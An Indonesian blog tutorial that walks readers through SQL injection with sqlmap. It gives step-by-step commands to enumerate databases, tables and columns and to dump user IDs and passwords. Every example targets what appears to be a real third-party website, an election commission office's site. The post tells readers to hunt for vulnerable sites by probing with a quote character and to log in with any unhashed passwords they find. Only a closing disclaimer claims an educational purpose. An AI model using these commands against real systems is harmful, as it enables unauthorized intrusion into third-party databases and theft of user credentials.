SQL Injection dengan bantuan SQLMAP

SQL Injection dengan bantuan SQLMAP - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul SQL Injection dengan bantuan SQLMAP, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Oke kali ini saya mau share tutorial SQL Injection dengan bantuan sqlmap. Tutor lama sih sebenarnya. Share aja barangkali ada yang kurang paham dengan tutor yang pernah dibaca maka ane mau share lagi dengan sejelas jelas nya.

Sebelum membaca tutor lebih lanjut , pastikan kalian yang pengguna windows sudah menginstall python.

• Download python


• Download Sqlmap

Setelah Python diinstall, unzip sqlmap nya . Ane sendiri meletakan nya di C:/tools/sqlmap . Silahkan sesuaikan sendiri.

Mulai mencari target yang vuln sqli. Pasti tau kan ? yang ketika diberi string tanda petik satu (‘) akan muncul error.

Saatnya eksekusi :v

Buka sqlmap nya.

run cmd , lalu ketik cd/tools/sqlmap <– sesuaikan sendiri dimana kalian tadi meletakkan folder sqlmap nya.

setelah itu masukkan command sqlmap.py -u url_vuln –dbs

contoh

sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 –dbs

nah, ketemu tuh nama database nya.

Lanjut ke command berikut nya

sqlmap.py -u url_vuln -D nama_database –tables

contoh

sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 -D ymsfrtlp_data –tables

Nah muncul tuh table dalam database nya.

Lanjut ke command berikut nya :

sqlmap.py -u nama_site -D nama_database -T nama_table –columns

contoh

sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 -D ymsfrtlp_data -T tabeluser –columns

Yosshhh.. muncul daftar column nya. Searang saat nya melihat isi dari user dan password.

sqlmap.py -u nama_site -Dnama_db -T nama_table -C nama_kolom –dump <– jika kolom lebih darisatu pisahkan dengan tanda koma.

contoh

sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 -D ymsfrtlp_data -T tabeluser -C userid,password –dump

Nah, udah keliatan kan user sama pass nya. Kadang ada yang di hash tapi kalo beruntung ya tinggal login . Pass nya gak di hash.

Dorr !

Sekian tutorial kali ini . Semoga bermanfaat 🙂

Sumber http://noob1t4.blogspot.com/

Sekian Artikel SQL Injection dengan bantuan SQLMAP.

Terima kasih telah membaca artikel SQL Injection dengan bantuan SQLMAP, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.

Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

Share this post